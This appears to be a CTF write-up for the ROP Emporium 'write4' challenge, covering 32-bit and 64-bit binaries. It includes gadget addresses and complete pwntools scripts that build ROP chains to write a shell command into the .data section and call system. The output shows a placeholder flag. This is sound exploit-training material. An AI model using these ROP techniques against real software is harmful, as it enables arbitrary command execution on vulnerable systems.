write4

Analysis

We have the same situation as we had in the split challenge, however in this case we do not have the string /bin/cat flag.txt lying around in the binary. We'll have to construct this string in the memory and then ask the system function to execute this.

So we'll just get right into it and try to build the write primitive that will get us the writing capabilities and the we'll construct the complete ROP chain to execution.

First we'll have to find a write able section of the binary that we'll write the data to.

$ readelf -S ./write432 | grep W
  [19] .init_array       INIT_ARRAY      08049f08 000f08 000004 00  WA  0   0  4
  [20] .fini_array       FINI_ARRAY      08049f0c 000f0c 000004 00  WA  0   0  4
  [21] .jcr              PROGBITS        08049f10 000f10 000004 00  WA  0   0  4
  [22] .dynamic          DYNAMIC         08049f14 000f14 0000e8 08  WA  6   0  4
  [23] .got              PROGBITS        08049ffc 000ffc 000004 04  WA  0   0  4
  [24] .got.plt          PROGBITS        0804a000 001000 000028 04  WA  0   0  4
  [25] .data             PROGBITS        0804a028 001028 000008 00  WA  0   0  4
  [26] .bss              NOBITS          0804a040 001030 00002c 00  WA  0   0 32
  W (write), A (alloc), X (execute), M (merge), S (strings), I (info),

Out of all the write able sections, I tried .jcr, .dynamic, but only .data seemed to be working, I am yet to figure out the reason for this. However, we'll use .data section to write the data.

32 bit

We have to find rop gadget that will let us write to a memory location, something like the following.

mov dword ptr [REG1], REG2

# This will write the data from REG2 to the memory 
# location of REG1

This is essentially what we are looking for. Another gadget that we'll need is the one that will help us load the appropriate data to the registers.

So the gadgets that I found were the following:

# Write to memory location
0x08048670 : mov dword ptr [edi], ebp ; ret
# Load the registers with data
0x080486da : pop edi ; pop ebp ; ret

So now all we had to do was make the ROP that will write the string chunks of 4 bytes to the appropriate location, for which I wrote the python script to automate the process.

from pwn import *
import re

final_rop = []
store_vals = 	0x080486da
write_str = 	0x08048670
system = 		0x08048430
data =			0x0804a028

def get_hex_arr():
	param = "/bin/cat ./flag.txt;"
	# This splits string to pieces of 4
	arr = re.findall('.{4}', param) 
	return [e[::-1].encode("hex") for e in arr]

i = 0
for chunk in get_hex_arr():
	final_rop.append(p32(store_vals))
	# This is to move the memory location by 4
	# every time we write a chunk of string
	final_rop.append(p32(data + i))
	final_rop.append(p32(int(chunk, 16)))
	final_rop.append(p32(write_str))
	i += 4


print "A"*44 + ''.join(final_rop) + p32(system) + "JUNK" + p32(data)

And using this exploit script, we have our flag.

$ python exploit.py > final.payload; cat final.payload | ./write432 
write4 by ROP Emporium
32bits

Go ahead and give me the string already!
> ROPE{a_placeholder_32byte_flag!}
Segmentation fault

64 bit

We'll follow the same process as done in 32 bit architecture binary, the only difference will come while loading the parameters for the system function, due to difference in way the x64 load parameters.

# Write to the memory location
0x0000000000400820 : mov qword ptr [r14], r15 ; ret
# Load the registers with value
0x0000000000400890 : pop r14 ; pop r15 ; ret

Python script that will generate the complete exploit

from pwn import *
import re

final_rop = []
store_vals = 	0x0000000000400890
write_str = 	0x0000000000400820
system = 		0x4005e0
data =			0x0000000000601050
write_rdi = 	0x0000000000400893
ret =			0x00000000004005b9

def get_hex_arr():
	# The string has been made of length divisible by 8
	# to fix string padding issues
	param = "/bin/cat ./flag.txt;echo"
	arr = re.findall('.{8}', param)
	return [e[::-1].encode("hex") for e in arr]

i = 0
for chunk in get_hex_arr():
	final_rop.append(p64(store_vals))
	final_rop.append(p64(data + i))
	final_rop.append(p64(int(chunk, 16)))
	final_rop.append(p64(write_str))
	i += 8

# Loading the parameter for system function
final_rop.append(p64(write_rdi))
final_rop.append(p64(data))
final_rop.append(p64(system))


print "A"*40 + ''.join(final_rop)
$ python exploit.py > final.payload ; cat final.payload | ./write4 
write4 by ROP Emporium
64bits

Go ahead and give me the string already!
> ROPE{a_placeholder_32byte_flag!}

Segmentation fault

Last updated